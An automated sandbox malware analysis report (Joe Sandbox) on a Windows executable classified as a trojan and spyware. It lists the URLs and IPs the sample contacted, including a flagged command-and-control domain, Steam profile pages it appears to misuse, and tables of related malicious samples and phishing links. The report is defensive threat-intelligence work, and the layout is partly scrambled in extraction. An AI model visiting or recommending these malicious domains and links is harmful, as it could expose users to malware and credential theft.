Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280425614.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp
Malicious: true; Antivirus detection: Avira URL Cloud: malware; Reputation: unknown

Name: http://ocsp.rootca1.amazontrust.com0:
Source: BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://sputnik-1985.com/api:u
Source: BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp
Malicious: true; Antivirus detection: Avira URL Cloud: malware; Reputation: unknown

Name: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://www.ecosia.org/newtab/
Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BnJxmraqlk.exe, 00000000.00000003.2268585286.0000000003D3E000.00000004.00000800.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.csF
Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://store.steampowered.com/privacy_agreement/
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false; Reputation: high

Name: https://sputnik-1985.com/
Source: BnJxmraqlk.exe, BnJxmraqlk.exe, 00000000.00000002.2349984104.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2295432665.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2285688248.0000000000F32000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2286149060.0000000000F32000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000002.2350128906.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2349043201.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2305113764.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        unknown
                                                                                                                        http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zBnJxmraqlk.exefalse
                                                                                                                          high
                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://sputnik-1985.com/api298BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            unknown
                                                                                                                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaBnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C18000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://store.steampowered.com/about/BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://updates.macrium.com/reflect/blank.asphttp:https://updates.macrium.com/InternetConnectionTimeBnJxmraqlk.exefalse
                                                                                                                                  high
                                                                                                                                  https://steamcommunity.com/my/wishlist/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://ocsp.sectigo.com0BnJxmraqlk.exefalse
                                                                                                                                        high
                                                                                                                                        https://help.steampowered.com/en/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/market/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://store.steampowered.com/news/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://community.fastly.steamstatic.coBnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#BnJxmraqlk.exefalse
                                                                                                                                                      high
                                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgBnJxmraqlk.exe, 00000000.00000003.2268991081.0000000003C19000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://steamcommunity.com/discussions/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://sputnik-1985.com/s&BnJxmraqlk.exe, 00000000.00000003.2295432665.0000000000F27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            unknown
                                                                                                                                                            http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0BnJxmraqlk.exefalse
                                                                                                                                                              high
                                                                                                                                                              https://store.steampowered.com/stats/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://store.steampowered.com/steam_refunds/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://x1.c.lencr.org/0BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://x1.i.lencr.org/0BnJxmraqlk.exe, 00000000.00000003.2267688023.0000000003C60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://sputnik-1985.com/s6BnJxmraqlk.exe, 00000000.00000002.2350128906.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2305113764.0000000000F22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://community.fastly.steamstatiBnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=eBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://steamcommunity.com/workshop/BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://support.mozilla.org/products/firefoxgro.allBnJxmraqlk.exe, 00000000.00000003.2268585286.0000000003D3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://store.steampowered.com/legal/BnJxmraqlk.exe, 00000000.00000003.2200713354.0000000000F20000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://community.fastlBnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://www.mozilla.orBnJxmraqlk.exe, 00000000.00000003.2268516884.0000000003C5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engBnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://sectigo.com/CPS0BnJxmraqlk.exefalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://updates.macrium.com/reflect/v8/languages/get.asp?lang=%s&major=%d&minor=%d&build=%dhttp:httpBnJxmraqlk.exefalse
                                                                                                                                                                                                          high
URL: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BnJxmraqlk.exe, 00000000.00000003.2201474731.0000000003C61000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://sputnik-1985.com/apilaV
Source: BnJxmraqlk.exe, 00000000.00000003.2279889600.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280425614.0000000003C1F000.00000004.00000800.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2280294712.0000000003C1A000.00000004.00000800.00020000.00000000.sdmp
Malicious: true
Antivirus detection: Avira URL Cloud: malware
Reputation: unknown

URL: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: BnJxmraqlk.exe, 00000000.00000003.2268991081.0000000003C19000.00000004.00000800.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&a
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=engl
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: BnJxmraqlk.exe
Malicious: false
Reputation: high

URL: https://store.steampowered.com/
Source: BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=e
Source: BnJxmraqlk.exe, 00000000.00000003.2189846084.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, BnJxmraqlk.exe, 00000000.00000003.2181179230.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

URL: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css
Source: BnJxmraqlk.exe, 00000000.00000003.2200726396.0000000000EC5000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.48.1 | sputnik-1985.com | United States | 13335 | CLOUDFLARENETUS | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585281
Start date and time: 2025-01-07 13:16:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: BnJxmraqlk.exe (renamed because the original name is a hash value)
Original Sample Name: 356bde316f31cfc2ed244a7cdd359617.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@11/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212, 2.23.227.202
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target BnJxmraqlk.exe, PID 612 because there are no executed functions
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Simulations

Time | Type | Description
07:17:02 | API Interceptor | 9x Sleep call for process: BnJxmraqlk.exe modified
Joe Sandbox View / Context: IPs

Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.48.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | twirpx.org/administrator/index.php
104.21.48.1 | SN500, SN150 Spec.exe | malicious | FormBook | www.antipromil.site/7ykh/
104.102.49.254 | r4xiHKy8aM.exe | malicious | Socks5Systemz | /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254 | http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | www.valvesoftware.com/legal.htm
Joe Sandbox View / Context: Domains

Match | Associated Sample Name / URL | Detection | Threat Name | Context
sputnik-1985.com | file.exe | malicious | Amadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog Stealer | 104.21.96.1
sputnik-1985.com | NjFiIQNSid.exe | malicious | LummaC | 104.21.112.1
steamcommunity.com | file.exe | malicious | Amadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog Stealer | 104.102.49.254
steamcommunity.com | NjFiIQNSid.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | ZxSWvC0Tz7.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | file.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | 176.113.115.170.ps1 | malicious | LummaC | 104.102.49.254
steamcommunity.com | KRNL.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | Gz1bBIg2Tw.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | OXoeX1Ii3x.exe | malicious | Unknown | 104.102.49.254
steamcommunity.com | OXoeX1Ii3x.exe | malicious | Unknown | 104.102.49.254
Joe Sandbox View / Context: ASNs

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://rebrand.ly/3d446f | malicious | HTMLPhisher | 104.26.5.15
CLOUDFLARENETUS | DHL DOCS 2-0106-25.exe | malicious | FormBook | 172.67.148.216
CLOUDFLARENETUS | Sales Acknowledgement - HES #982323.pdf | malicious | Unknown | 104.16.123.96
CLOUDFLARENETUS | https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000 | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip | malicious | Unknown | 172.64.149.23
CLOUDFLARENETUS | Mansourbank Swift-TT379733 Report.svg | malicious | Branchlock Obfuscator | 172.64.41.3
CLOUDFLARENETUS | Mansourbank Swift-TT680169 Report.svg | malicious | Branchlock Obfuscator | 104.18.186.31
CLOUDFLARENETUS | https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8d | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | PO_62401394_MITech_20250601.exe | malicious | FormBook | 104.21.18.171
CLOUDFLARENETUS | https://link.edgepilot.com/s/1b4c2fcb/nQHbBC0YQUOfuyi9X74dgg?u=https://url.usb.m.mimecastprotect.com/s/sZGCCm7Wwmt5092LsBiWSRG4Fz?domain=link.edgepilot.com | malicious | Unknown | 104.18.69.40
AKAMAI-ASUS | file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip | malicious | Unknown | 184.28.90.27
AKAMAI-ASUS | Mes_Drivers_3.0.4.exe | malicious | Unknown |
                                                                                                                                                                                                                          • 23.45.0.233
                                                                                                                                                                                                                          NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.49.251.7
                                                                                                                                                                                                                          w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.57.90.149
                                                                                                                                                                                                                          malware.batGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                                                          https://www.scribd.com/document/787929982/script-tlsfranceGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.102.34.86
                                                                                                                                                                                                                          Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 23.44.181.15
                                                                                                                                                                                                                          Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 95.101.191.171
                                                                                                                                                                                                                          Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                          • 104.76.15.30
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          H565rymIuO.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.48.1
